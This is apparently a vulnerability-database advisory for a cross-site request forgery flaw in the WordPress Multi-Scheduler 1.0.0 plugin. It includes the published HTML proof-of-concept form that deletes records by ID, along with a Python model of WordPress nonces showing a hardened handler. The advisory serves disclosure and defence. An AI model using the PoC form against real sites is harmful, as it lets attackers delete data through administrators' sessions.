WordPress Multi-Scheduler Cross-Site Request Forgery Vulnerability

Vulnerability ID 2044245 Vulnerability Type Cross-Site Request Forgery
Published 2020-05-30 Updated 2020-06-23
CVE ID CVE-2020-13426

CNNVD-ID CNNVD-202006-1548
Platform N/A CVSS Score N/A
|Source
https://cxsecurity.com/issue/WLB-2020050235
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202006-1548
|Details
WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports hosting personal blog sites on servers running PHP and MySQL. Multi-Scheduler is a scheduler plugin for WordPress.
WordPress Multi-Scheduler 1.0.0 contains a cross-site request forgery (CSRF) vulnerability. It stems from the web application not verifying that a request was deliberately issued by a trusted user: the delete form on the plugin's admin page is accepted without a nonce or any other anti-CSRF token (the proof-of-concept form below carries none). An attacker who lures a logged-in administrator to a page under their control can therefore make the victim's browser send an unintended request to the site, such as deleting a record whose ID the attacker supplies.
|Exploit
# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)
# Google Dork: N/A
# Date: 2020-05-21
# Author Homepage: https://infayer.com/
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip
# Category: Web Application
# Version: 1.0.0
# Tested on: CentOS 7 / WordPress 5.4.1
# CVE : CVE-2020-13426
# 1. Technical Description:
The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability
in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.
# 2. Proof of Concept (PoC):
<html>
<!-- CSRF form as published: POSTs only the record ID and the delete flag, no nonce field -->
<form method="POST" action="http://[TARGET]/wp-admin/admin.php?page=msbdt_professional">
<input type="hidden" value="[ID]" name="pro_delete_id"><br>
<input type="hidden" value="Delete" name="professional_delete">
<input type="submit" value="Delete user">
</form>
</html>
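The missing check that the description and the PoC above point at is a WordPress nonce: in a real plugin the fix is to emit wp_nonce_field() in the delete form and call check_admin_referer() plus current_user_can() in the handler, so that a form the victim's browser submits from an attacker's page (which cannot know the victim's nonce) is rejected. The following is an added example, not code from the Multi-Scheduler plugin or from the exploit author; it re-implements the WordPress nonce scheme (tick | action | user id | session token hashed with a site secret, ten hex characters kept, current and previous tick accepted) in plain Python so the behaviour can be run offline, and contrasts a handler that trusts any POST carrying pro_delete_id and professional_delete with one that demands a valid nonce and capability. The site secret, the action name msbdt_delete_professional, the user record and the sample records are constructed for the example.

```python
"""Model of WordPress-style CSRF nonces (added example, not the plugin's code)."""
import hashlib
import hmac
import math

NONCE_LIFE = 24 * 60 * 60  # DAY_IN_SECONDS; WordPress accepts two half-life ticks
SITE_SECRET = b"constructed-site-secret-not-a-real-wp-salt"  # assumption: stands in for wp_salt('nonce')
ACTION = "msbdt_delete_professional"  # hypothetical nonce action name for the delete form


def nonce_tick(now):
    """Same tick function as wp_nonce_tick(): ceil(time / (life / 2))."""
    return math.ceil(now / (NONCE_LIFE / 2))


def _hash(tick, action, user_id, session_token):
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    # wp_hash() uses HMAC-MD5 with the nonce salt; WordPress keeps substr(hash, -12, 10)
    return hmac.new(SITE_SECRET, msg, hashlib.md5).hexdigest()[-12:-2]


def create_nonce(action, user_id, session_token, now):
    """Equivalent of wp_create_nonce(): bound to user, session, action and time window."""
    return _hash(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now):
    """Equivalent of wp_verify_nonce(): 1 = current tick, 2 = previous tick, 0 = invalid."""
    if not nonce or user_id == 0:  # nothing to bind an anonymous request to
        return 0
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        if hmac.compare_digest(_hash(t, action, user_id, session_token), nonce):
            return age
    return 0


def handle_delete_vulnerable(post, records):
    """Shape of the flaw the advisory describes: any POST with the two fields deletes the record."""
    if "professional_delete" in post and post.get("pro_delete_id", "").isdigit():
        records.pop(int(post["pro_delete_id"]), None)
        return "deleted"
    return "ignored"


def handle_delete_hardened(post, records, user, now):
    """Mirrors current_user_can() + check_admin_referer() before acting on the request."""
    if "professional_delete" not in post:
        return "ignored"
    if "manage_options" not in user["caps"]:
        return "forbidden"  # capability check: not every logged-in user may delete
    token = post.get("_wpnonce", "")
    if not verify_nonce(token, ACTION, user["id"], user["session_token"], now):
        return "forbidden"  # check_admin_referer() would wp_die() here
    rid = post.get("pro_delete_id", "")
    if not rid.isdigit() or int(rid) not in records:
        return "ignored"
    del records[int(rid)]
    return "deleted"


def demo(now=1_700_000_000):
    """Replays the PoC form against both handlers, then a legitimate nonce-bearing submit."""
    records = {7: "alice", 8: "bob"}  # constructed sample records
    admin = {"id": 1, "session_token": "sess-abc", "caps": {"manage_options"}}  # constructed
    csrf_post = {"pro_delete_id": "7", "professional_delete": "Delete"}  # exactly the PoC's fields
    vulnerable = handle_delete_vulnerable(dict(csrf_post), dict(records))
    hardened_csrf = handle_delete_hardened(dict(csrf_post), dict(records), admin, now)
    legit = dict(csrf_post, _wpnonce=create_nonce(ACTION, admin["id"], admin["session_token"], now))
    hardened_legit = handle_delete_hardened(legit, dict(records), admin, now)
    return vulnerable, hardened_csrf, hardened_legit


if __name__ == "__main__":
    print(demo())  # ('deleted', 'forbidden', 'deleted')
```

The nonce is not single-use: WordPress accepts it for the current and the previous twelve-hour tick, and it is keyed to the user's session token, so an attacker's page can neither guess it nor reuse one from another account. Note that the nonce check only establishes intent; the capability check is still required because a nonce can be created for any logged-in user.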
|References

Source: MISC

Link: https://cxsecurity.com/issue/WLB-2020050235

Source: MISC

Link: https://infayer.com/archivos/448

Source: EXPLOIT-DB

Link: https://www.exploit-db.com/exploits/48532

Source: MISC

Link: https://wordpress.org/plugins/multi-scheduler/#developers

Source: MISC

Link: https://twitter.com/UnD3sc0n0c1d0

Source: MISC

Link: https://packetstormsecurity.com/files/157867/WordPress-Multi-Scheduler-1.0.0-Cross-Site-Request-Forgery.html

Source: MISC

Link: https://research-labs.net/search/exploits/wordpress-plugin-multi-scheduler-100-cross-site-request-forgery-delete-user

Source: MISC

Link: https://0day.today/exploit/34496

Source: nvd.nist.gov

Link: https://nvd.nist.gov/vuln/detail/CVE-2020-13426